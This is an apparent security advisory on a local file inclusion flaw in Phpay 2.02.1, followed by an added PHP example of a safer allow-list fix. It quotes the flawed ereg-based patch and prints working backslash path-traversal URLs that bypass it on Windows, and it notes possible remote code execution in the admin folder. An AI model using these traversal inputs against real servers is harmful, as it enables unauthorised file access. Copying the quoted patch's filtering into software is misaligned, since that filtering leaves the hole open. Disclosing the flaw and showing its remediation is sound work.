Phpay - Local File Inclusion

Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 5.8/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

By Michael Brooks

Vulnerability Type: Local File Inclusion
Software: Phpay
Homepage:
Version Affected: 2.02.1

Phpay has been affected by multiple local file include flaws; as a result, this patch was written:

    // Remove colons, anything matching the pattern "../", and forward slashes.
    $config = ereg_replace(":","", $config);
    $config = trim(ereg_replace("../","", $config));
    $config = trim(ereg_replace("/","", $config));
    // Require ".inc.php" to match somewhere in the name (unanchored).
    if (($config=="")|| (!eregi(".inc.php",$config))){$config=""; echo "<!--$config-->\n";}
    if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit;}
    require("./$config");

To bypass this patch, backslashes can be used instead of forward slashes on Windows systems. Also, .inc.php must exist *somewhere* in the string.

Local File Include for Windows only:

http://localhost/phpayv2.02a/main.php?\\..\\admin\\.htaccess

or, if magic_quotes_gpc is turned on:

http://localhost/phpayv2.02a/main.php?\..\admin\.htaccess

Remote code execution is accessible in the ./admin/ folder. The admin folder *should* be protected by a .htaccess file similar to osCommerce2.

Vulnerable configuration: A there is a call to extract($_GET) so the exploit will work regardless of register_globals.

Using Linux is a very good fix for this issue.

Merry Christmas
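An added example, not part of the original advisory or of Phpay's code: one way to choose the config file without stripping separators, by allow-listing the whole name and then checking the canonical path. The function name resolve_config(), the directory layout and the sample file names are assumptions.

```php
<?php
// Added example, not Phpay code: resolve_config() and the demo directory are hypothetical.

/** Return the absolute path of an includable config file, or null to refuse. */
function resolve_config(string $name, string $baseDir): ?string
{
    // Allow-list the entire name, anchored at both ends. Slashes, backslashes,
    // colons and extra dots never match, on any operating system.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.inc\.php\z/', $name)) {
        return null;
    }
    // Canonicalise and confirm the file really sits under $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved outside the config directory (e.g. via a symlink)
    }
    return $path;
}

// Constructed demo: a temporary config directory holding one valid file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'phpay_demo_' . uniqid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'shop.inc.php', "<?php // sample config\n");

$candidates = [
    'shop.inc.php',            // legitimate name
    '\\..\\admin\\.htaccess',  // backslash form quoted in the advisory
    '../shop.inc.php',         // forward-slash traversal
    'shop.inc.php.bak',        // ".inc.php" present but not the full name
    'missing.inc.php',         // well-formed but no such file
];
foreach ($candidates as $candidate) {
    $verdict = resolve_config($candidate, $dir) === null ? 'rejected' : 'accepted';
    printf("%-22s %s\n", $candidate, $verdict);
}

unlink($dir . DIRECTORY_SEPARATOR . 'shop.inc.php');
rmdir($dir);
```

Only the first candidate is accepted. The caller should pass the returned absolute path to require, never the raw request value.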
